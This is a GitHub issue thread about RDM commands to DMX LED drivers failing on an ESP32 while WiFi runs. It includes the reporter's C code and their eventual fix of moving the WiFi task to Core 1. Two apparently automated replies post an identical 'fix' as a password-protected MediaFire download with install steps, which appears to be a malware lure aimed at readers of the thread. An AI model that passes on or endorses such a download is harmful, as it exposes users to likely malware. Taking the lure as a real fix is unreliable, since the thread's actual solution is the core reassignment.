someweisguy/esp_dmx #165: Could not get address of DMX & RDM led drivers while using wifi

phanvinh-eee, 2024-08-31:
Hi,
I am using RMD command to check status of devices when it is connected or disconnected. And I also use DMX command to control color of led drivers. Sending DMX command is always correct but RDM command sometimes can be sent not successful. Then I can not receive any response of device. I notice the problem will appears when I am using wifi. It does not meet any problem when I turn off wifi.
Thank you!

This is a correct RMD command 
[image]

And here is error RDM command
[image]

It run correctly at the beginning
[image]

```
rdm_uid_t uids[32];
bool sending_rdm_flag = true;
void rdm_discover_handle()
{   
    static size_t devices_found = 0;
    static uint8_t device_cnt = 0;
    if (!devices_found) {
        devices_found = rdm_discover_devices_simple(DMX_OUTPUT_UART_NUM, uids, 32);
    }else{
        if(device_cnt >= devices_found){
            device_cnt = 0;
        }
        // Print the UID of each device found        
        ESP_LOGI(TAG, "Device %i has UID " UIDSTR, device_cnt, UID2STR(uids[device_cnt]));
        const rdm_uid_t *dest_uid = &uids[device_cnt];
        const rdm_sub_device_t sub_device = RDM_SUB_DEVICE_ROOT;

        rdm_ack_t ack;

        // Get and set the DMX start address
        uint16_t dmx_start_address = 0;
        uint8_t count=0;
        while (!rdm_send_get_dmx_start_address(DMX_OUTPUT_UART_NUM, dest_uid, sub_device,
                                          &dmx_start_address, &ack)) {
          if(++count >= 10) {
            ESP_LOGW(TAG, "Not found device");
            vTaskDelay(100 / portTICK_RATE_MS);
            break;
          }
        }
        if(dmx_start_address){
            ESP_LOGI(TAG, "DMX start address is %i", dmx_start_address);
        }
        // Get the device info
        rdm_device_info_t device_info;
        if (rdm_send_get_device_info(DMX_OUTPUT_UART_NUM, dest_uid, sub_device, &device_info,
                                    &ack)) {
        }
        device_cnt++;
    }
    sending_rdm_flag = false;
}
```

Here I send DMX command. Each 1 second I will send RDM command
```
static void oneshot_timer_callback(void *arg)
{
	if (discover_cnt++>33){
		sending_rdm_flag = true;
		discover_cnt = 0;
	} else if (sending_rdm_flag == false) {
		dmx_set_512_packet_cct(&newrgbdmx);
		dmx_write(DMX_OUTPUT_UART_NUM, dmxData, DMX_PACKET_SIZE);
		dmx_send_num(DMX_OUTPUT_UART_NUM, DMX_PACKET_SIZE);
    	dmx_wait_sent(DMX_OUTPUT_UART_NUM, DMX_TIMEOUT_TICK);
	}
	esp_timer_start_once(oneshot_timer, 30000);//oneshot_timer_break
}
```

rickdoq, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

KrissV2, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

phanvinh-eee, 2024-08-31:
I fixed this by moving Wifi task to Core 1

closed 2024-08-31 by phanvinh-eee